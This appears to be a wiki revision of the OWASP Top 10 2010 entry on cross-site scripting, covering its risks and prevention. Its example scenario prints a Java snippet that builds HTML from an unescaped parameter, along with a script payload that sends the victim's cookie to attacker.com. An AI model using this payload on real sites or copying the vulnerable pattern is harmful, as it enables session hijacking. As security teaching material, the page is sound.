Difference between revisions of "Wikimedia-Vulnerability"
m (moved Top 10 2010-A2 to Wikimedia-Vulnerability: This page has a Wikimedia XSS vulnerability. I'd like to analyze it at a later point in time.)
Latest revision as of 14:23, 20 April 2010
|Threat Agents||Attack Vectors||Security Weakness||Technical Impact||Business Impacts|
|Consider anyone who can send untrusted data to the system, including external users, internal users, and administrators.||Attacker sends text- based attack scripts that exploit the interpreter in the browser. Almost any source of data can be an attack vector, including internal sources such as data from|| XSS is the most prevalent web application security flaw. XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content. There are three known types of XSS flaws: 1) Stored, 2) Reflected, and 3) DOM based XSS.
Detection of most XSS flaws is fairly easy via testing or code analysis.
|Attackers can execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users, hijack the user’s browser using malware, etc.|| Consider the business value of the affected system and all the data it processes.
Also consider the business impact of public exposure of the vulnerability.
Am I Vulnerable to XSS?
You need to ensure that all user supplied input sent back to the browser is verified to be safe (via input validation), and that user input is properly escaped before it is included in the output page. Proper output encoding ensures that such input is always treated as text in the browser, rather than active content that might get executed.
Web 2.0 technologies, such as AJAX, make XSS much more difficult to detect via automated tools.
How Do I Prevent XSS?
Preventing XSS requires keeping untrusted data separate from active browser content.
- Positive or “whitelist” input validation with appropriate canonicalization and decoding is also recommended as it helps protect against XSS, but is not a complete defense as many applications require special characters in their input. Such validation should, as much as possible, decode any encoded input, and then validate the length, characters, format, and any business rules on that data before accepting the input.
Example Attack Scenarios
The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:
(String) page += "<input name='creditcard' type='TEXT‘ value='" + request.getParameter("CC") + "'>";
The attacker modifies the ‘CC’ parameter in their browser to:
'><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi? foo='+document.cookie</script>'.
This causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session. Note that attackers can also use XSS to defeat any CSRF defense the application might employ. See A5 for info on CSRF. }}